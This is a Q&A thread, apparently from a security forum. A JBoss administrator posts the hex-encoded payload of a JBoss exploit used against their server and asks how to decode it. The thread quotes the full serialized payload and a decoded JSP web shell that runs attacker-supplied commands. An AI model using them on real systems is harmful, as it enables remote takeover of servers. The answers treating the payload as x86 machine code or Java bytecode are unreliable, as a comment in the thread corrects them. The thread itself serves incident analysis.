# Decrypt Java Payload

Tags: java, shellcode

I found some destructive activity on my JBoss server and after a lot of google searching I found this exploit https://www.exploit-db.com/exploits/36575/ .
I know the attacker uses this exploit to upload a shell on my server and I upgraded my JBoss server and the problem was solved successfully.
In this exploit I found a payload:

```
"\xac\xed\x00\x05\x73\x72\x00\x29\x6f\x72\x67\x2e\x6a\x62\x6f\x73"
                "\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d\x61\x72"
                "\x73\x68\x61\x6c\x6c\x65\x64\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f"
                "\x6e\xf6\x06\x95\x27\x41\x3e\xa4\xbe\x0c\x00\x00\x78\x70\x70\x77"
                "\x08\x78\x94\x98\x47\xc1\xd0\x53\x87\x73\x72\x00\x11\x6a\x61\x76"
                "\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2"
                "\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75"
                "\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e"
                "\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00"
                "\x78\x70\xe3\x2c\x60\xe6\x73\x72\x00\x24\x6f\x72\x67\x2e\x6a\x62"
                "\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d"
                "\x61\x72\x73\x68\x61\x6c\x6c\x65\x64\x56\x61\x6c\x75\x65\xea\xcc"
                "\xe0\xd1\xf4\x4a\xd0\x99\x0c\x00\x00\x78\x70\x7a\x00\x00\x02\xc6"
                "\x00\x00\x02\xbe\xac\xed\x00\x05\x75\x72\x00\x13\x5b\x4c\x6a\x61"
                "\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90"
                "\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x04"
                "\x73\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65"
                "\x6d\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f"
                "\x03\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00\x78\x70\x74\x00\x2c\x6a"
                "\x62\x6f\x73\x73\x2e\x61\x64\x6d\x69\x6e\x3a\x73\x65\x72\x76\x69"
                "\x63\x65\x3d\x44\x65\x70\x6c\x6f\x79\x6d\x65\x6e\x74\x46\x69\x6c"
                "\x65\x52\x65\x70\x6f\x73\x69\x74\x6f\x72\x79\x78\x74\x00\x05\x73"
                "\x74\x6f\x72\x65\x75\x71\x00\x7e\x00\x00\x00\x00\x00\x05\x74\x00"
                "\x10\x73\x68\x65\x6c\x6c\x69\x6e\x76\x6f\x6b\x65\x72\x2e\x77\x61"
                "\x72\x74\x00\x0c\x73\x68\x65\x6c\x6c\x69\x6e\x76\x6f\x6b\x65\x72"
                "\x74\x00\x04\x2e\x6a\x73\x70\x74\x01\x79\x3c\x25\x40\x20\x70\x61"
                "\x67\x65\x20\x69\x6d\x70\x6f\x72\x74\x3d\x22\x6a\x61\x76\x61\x2e"
                "\x75\x74\x69\x6c\x2e\x2a\x2c\x6a\x61\x76\x61\x2e\x69\x6f\x2e\x2a"
                "\x22\x25\x3e\x3c\x70\x72\x65\x3e\x3c\x25\x69\x66\x28\x72\x65\x71"
                "\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61\x6d\x65\x74\x65"
                "\x72\x28\x22\x70\x70\x70\x22\x29\x20\x21\x3d\x20\x6e\x75\x6c\x6c"
                "\x20\x26\x26\x20\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x48"
                "\x65\x61\x64\x65\x72\x28\x22\x75\x73\x65\x72\x2d\x61\x67\x65\x6e"
                "\x74\x22\x29\x2e\x65\x71\x75\x61\x6c\x73\x28\x22\x6a\x65\x78\x62"
                "\x6f\x73\x73\x22\x29\x20\x29\x20\x7b\x20\x50\x72\x6f\x63\x65\x73"
                "\x73\x20\x70\x20\x3d\x20\x52\x75\x6e\x74\x69\x6d\x65\x2e\x67\x65"
                "\x74\x52\x75\x6e\x74\x69\x6d\x65\x28\x29\x2e\x65\x78\x65\x63\x28"
                "\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61\x6d"
                "\x65\x74\x65\x72\x28\x22\x70\x70\x70\x22\x29\x29\x3b\x20\x44\x61"
                "\x74\x61\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x20\x64\x69"
                "\x73\x20\x3d\x20\x6e\x65\x77\x20\x44\x61\x74\x61\x49\x6e\x70\x75"
                "\x74\x53\x74\x72\x65\x61\x6d\x28\x70\x2e\x67\x65\x74\x49\x6e\x70"
                "\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x29\x29\x3b\x20\x53\x74\x72"
                "\x69\x6e\x67\x20\x64\x69\x73\x72\x20\x3d\x20\x64\x69\x73\x2e\x72"
                "\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x3b\x20\x77\x68\x69\x6c\x65"
                "\x20\x28\x20\x64\x69\x73\x72\x20\x21\x3d\x20\x6e\x75\x6c\x6c\x20"
                "\x29\x20\x7b\x20\x6f\x75\x74\x2e\x70\x72\x69\x6e\x74\x6c\x6e\x28"
                "\x64\x69\x73\x72\x29\x3b\x20\x64\x69\x73\x72\x20\x3d\x20\x64\x69"
                "\x73\x2e\x72\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x3b\x20\x7d\x20"
                "\x7d\x25\x3e\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67"
                "\x2e\x42\x6f\x6f\x6c\x65\x61\x6e\xcd\x20\x72\x80\xd5\x9c\xfa\xee"
                "\x02\x00\x01\x5a\x00\x05\x76\x61\x6c\x75\x65\x78\x70\x01\x75\x72"
                "\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74"
                "\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00"
                "\x78\x70\x00\x00\x00\x05\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61"
                "\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x71\x00\x7e\x00\x0f\x71\x00"
                "\x7e\x00\x0f\x71\x00\x7e\x00\x0f\x74\x00\x07\x62\x6f\x6f\x6c\x65"
                "\x61\x6e\x63\x79\xb8\x87\x78\x77\x08\x00\x00\x00\x00\x00\x00\x00"
                "\x01\x73\x72\x00\x22\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e\x69"
                "\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x49\x6e\x76\x6f\x63\x61"
                "\x74\x69\x6f\x6e\x4b\x65\x79\xb8\xfb\x72\x84\xd7\x93\x85\xf9\x02"
                "\x00\x01\x49\x00\x07\x6f\x72\x64\x69\x6e\x61\x6c\x78\x70\x00\x00"
                "\x00\x04\x70\x78"
```

I thought it is an assembly shellcode, but I'm in doubt now what it is? How did they write this payload? How can I decrypt it?

Answer (score 3):

It is ultimately going to be a web shell that provides command execution. The relevant code/strings are shown here..

```
shellinvoker.war
shellinvoker.jsp

<%@ page import="java.util.*,java.io.*"%><pre><%if(request.getParameter("ppp") != null && request.getHeader("user-agent").equals("jexboss") ) { Process p = Runtime.getRuntime().exec(request.getParameter("ppp")); DataInputStream dis = new DataInputStream(p.getInputStream()); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } }%>
```

Updated - looks like this was used to compromise you.

https://gist.github.com/googleinurl/d9940803b101c9ebbf54

Comment: Did you use a java decompiler for decrypt this payload? Please tell me the name of decompiler.

Answer (score 2):

It's not encrypted, merely encoded. Note that the entire range of values (\x00-\xff, or 0-255) seems to be present, so it is indeed likely to be machine language and not a script.

How it's created? The attacker probably created something in C or another language and compiled it.
How to figure out the contents? Take the values and enter them in a disassembler. I've tried entering it in [this online service](https://www.onlinedisassembler.com/odaweb/) that I found using a search engine.

Assuming the target is an x86 architecture, the first part would be:

```
ac              lods al,BYTE PTR ds:[esi]   
ed              in eax,dx   
000573720029add BYTE PTR ds:0x29007273,al         
6f              outs dx,DWORD PTR ds:[esi]        
7267            jb loc_00000072     
2e6a26          cs push 0x26          
f730            div DWORD PTR [eax]
...
```

You could enter the entire contents in a dissassembler and than target a decompiler at it. It does help to know the target architecture though.

Answer (score 1):

```
How did they write this payload? How can I decrypt it?
```

like S.L. Barth said, it is hex encoded.
Plugging it into a hex decoder,  it turns out to be [Java bytecode](https://en.wikipedia.org/wiki/Java_bytecode) (the language that Java is compiled into for the JVM).  So it is machine code if the JVM is the machine.  It does not look "obfuscated", so a Java decompiler ([like JD-Gui](http://jd.benow.ca/)) should be able to turn it back into readable Java code.

Mark posted the link to the exploit which has the hex you posted as its payload.

Comment: Actually it's an 'externalized' (variant of serialized) object of (outer) type `org.jboss.invocation.MarshalledInvocation` containing some other bits including ultimately the JSP. Class files begin `ca fe ba be` and contain bytecode; this does neither.

Comment: oh. even better.

Comment: You're right. Wouldn't it be possible, though, to inject a part of a class file so it wouldn't start with CA FE BA BE?  It probably wouldn't be understandable by a decompiler.

Comment: in general you could mangle a classfile and then reconstruct it *if* the target had code to do that, but Jboss doesn't have any such code I know of, whereas it does accept quite a few kinds of RMIs; plus the data here is mostly recognizable classnames and text but *not* method names/signatures or other likely constpool entries, bytecode, and stackmaps needed for any class (pseudo)file.